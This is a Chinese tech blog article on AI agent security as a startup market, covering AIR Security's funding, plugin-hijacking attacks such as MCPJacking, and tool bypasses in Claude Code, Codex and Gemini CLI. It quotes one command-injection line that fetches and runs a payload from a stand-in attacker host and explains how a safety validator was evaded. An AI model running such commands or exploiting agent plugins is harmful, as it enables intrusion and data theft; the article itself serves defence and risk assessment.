← 文章 / AI技术
智械AI 4小时前 · 2026-09-04 11:18:19 · 0 阅读

AIAgent的安全,正在成为一个独立赛道

"这不是一个扫描问题,是一个持续验证问题。" Sequoia合伙人Bogomil Balkansky,2026年9月

AIR Security上周带着5,000万美元走出隐身模式,Sequoia领投,成立才6个月。做的事情就一件:审查AI Agent插件的安全性。投资人认为AI Agent的供应链安全是一个新品类,值得单独建一家公司来做。AIR公布的数据也反映了Agent安全问题的严重性:MCP官方注册中心里,155个插件的后端已经下线但注册条目还活着;GitHub上142,836个Skill里,925个依赖已过期的域名或被删除的账号;整个插件生态17,800多个组件,27%存在安全风险。AIR实际操作了MCPJacking攻击,注册过期域名就拿到了对信任这些插件的Agent的完全控制权。
MCPJacking攻击流程,来源:AIR Security,2026年8月
AIR不是唯一发现这个问题的团队。Cloud Security Alliance的调查显示,65%的企业在过去一年经历过AI Agent引发的安全事件,其中61%涉及数据泄露,43%导致运营中断。Anthropic和微软的MCP Server被发现存在远程代码执行漏洞,BlueRock Security扫描了7,000多个MCP Server,36.7%存在SSRF漏洞。OpenClaw框架的包仓库里发现了1,184个恶意skill,大约占整个生态的五分之一。5,000万美元是因为资本市场认为:AI Agent的供应链安全是一个新品类,不是一个功能补丁。

平台自己解决不了这个问题

Anthropic的Claude Code有内置命令验证(23项检查),被绕过了。OpenAI的Codex有AGENTS.md信任模型,通过共享工作目录被利用了。Google的Gemini CLI有CVSS 10.0漏洞,沙箱启动前就自动信任了.env文件。三家平台都发布了有漏洞的Agent工具,独立安全厂商的存在恰恰因为平台没有自己解决这些问题。Correctover(做开源验证工具的团队)的分析比攻击案例本身更有价值。我认为他们指出的三个结构性问题才是整件事的核心。沙箱和静态分析依赖信号来判断安全性,但混淆后的代码去掉了所有信号。Claude Code的命令验证器跑了23项安全检查,一个预处理步骤去掉了单引号文本。攻击者用git push --receive-pack='$(curl attacker/payload | bash)' origin main,验证器看到的是git push origin main,shell看到的是命令注入。沙箱回答的是"它在实验室里做了什么",不能回答"它在我的机器上、周二、用我的数据会做什么"。业务逻辑层面的滥用更难。一个CRM插件有批量导出功能是正常的,但Agent把40,000条联系人导出到个人邮箱时,每个单独的工具调用都是格式正确、被允许的。判断"这不对"需要理解你的业务,不是检查代码。能执行任意代码的进程可以重写自己的审计记录。通过/失败的标记是信号,不是证据。这三个问题不是技术能力不够,是思路本身有盲区。平台会内置基础防护(prompt过滤、权限范围、沙箱默认配置),但跨平台治理、合规证据链、供应链扫描,这些平台做不了。

这个赛道会怎么走

资本已经在投票了。Agentic AI安全赛道top10公司累计融资36亿美元。Gartner预测AI安全市场将从2024年的108亿美元增长到2029年的1,720亿美元,年复合增长率73.9%。但纯MCP安全赛道目前只有4家公司,总融资约4,000万美元(Operant AI、Runlayer、Helmet Security、Manufact),这个数字和17,000多个已部署的MCP Server相比,严重不对称。大厂在通过收购入场。Palo Alto Networks收购了Protect AI(约5亿美元),Check Point收购了Lakera,CrowdStrike开始发布Agent工具链攻击的研究报告。微软发布了Agent365+MCP网关,每人每月15美元。Google把MCP Server支持集成进了Security Operations。MCP协议本身被捐赠给了Agentic AI Foundation,由Anthropic、Block、OpenAI共同发起,Google、微软、AWS、Cloudflare参与支持。最可能的结局:平台内置基础安全,独立厂商做深度治理。就像云平台内置了基础安全,CrowdStrike和Palo Alto仍然活得不错。但赛道刚起步,格局远没有确定。AIR成立才6个月,27%是自己的数据,还没被独立验证。Runlayer签了8个独角兽客户,但8个客户不是24/7 SOC集成。这些种子轮公司建的是任务关键的安全基础设施,面对的是一个还在成熟的协议,有些会在Series A之前被收购,有些会烧完现金。CISO评估这些工具时需要同时准备备选方案。

企业部署AI Agent时该做什么

先盘点,再谈防护。打开你公司所有AI工具的配置,列出它们连接的MCP Server和Skill清单。来源不明的、域名已过期的、已经不用的,删掉。一个你三个月没用过的插件,它的后端可能已经下线了,但你的Agent还在信任它。如果你们公司已经有SCA(软件成分分析)工具,看看它能不能扫描Agent插件,大概率不能。这是第一个缺口。最小权限原则,但在Agent场景下后果更严重。Agent的插件运行时拥有和用户完全相同的权限。如果你只需要它读取代码仓库,就不要给它网络访问权限。这不是新原则,但Agent能执行系统命令,一个被劫持的Agent不只是泄露数据,还能删库。在平台安全能力成熟之前,高风险场景考虑独立工具。Tanav扫描了2,535个公开MCP仓库,22%存在严重漏洞。NeuralTrust提供免费的MCP Scanner。Truvant/AgentWarden做安装前拦截,插件过不了扫描就不让装。这些工具还在早期,但在平台的安全措施被反复绕过的阶段,多一层防线比少一层好。把Agent安全纳入供应商评估。问你的AI平台供应商三个问题:你们的插件市场有没有安全扫描?插件出了安全问题谁负责?你们对第三方插件的信任模型是什么?如果答不上来,说明这个供应商还没准备好。

资料来源

  • TechCrunch: AIR raises $50M to help companies vet the skills and add-ons AI agents use — Ram Iyer,2026年9月
  • AIR Security: MCPJacking — 155 Hijackable MCPs — 2026年8月
  • AIR Security: SkillJacking — 925 Skills Hijacked — 2026年7月
  • AIR Security: The Story of Skills — 恶意skill实验,2026年6月
  • Correctover: What Automated Vetting Solves and What It Can't Yet — 自动审查的能力边界
  • CSA/Token Security: Autonomous but Not Controlled — AI Agent Incidents Now Common in Enterprises — 65%企业经历AI Agent安全事件,2026年4月
  • BlueRock Security: 7,000+ MCP Servers, 36.7% Vulnerable to SSRF — MCP Server漏洞扫描,2026年
  • Software Strategies Blog: $3.6 Billion in Agentic AI Security Funding — 赛道融资分析,2026年3月
  • Tanav: We scanned 2,535 public MCP repos. 22% are critical — MCP仓库安全扫描,2026年6月
  • CrowdStrike: How Agentic Tool Chain Attacks Threaten AI Agent Security — Agent工具链攻击研究,2026年

更多AI前沿手记,欢迎关注「智械AI」

原始来源: 智械AI

评论 (0)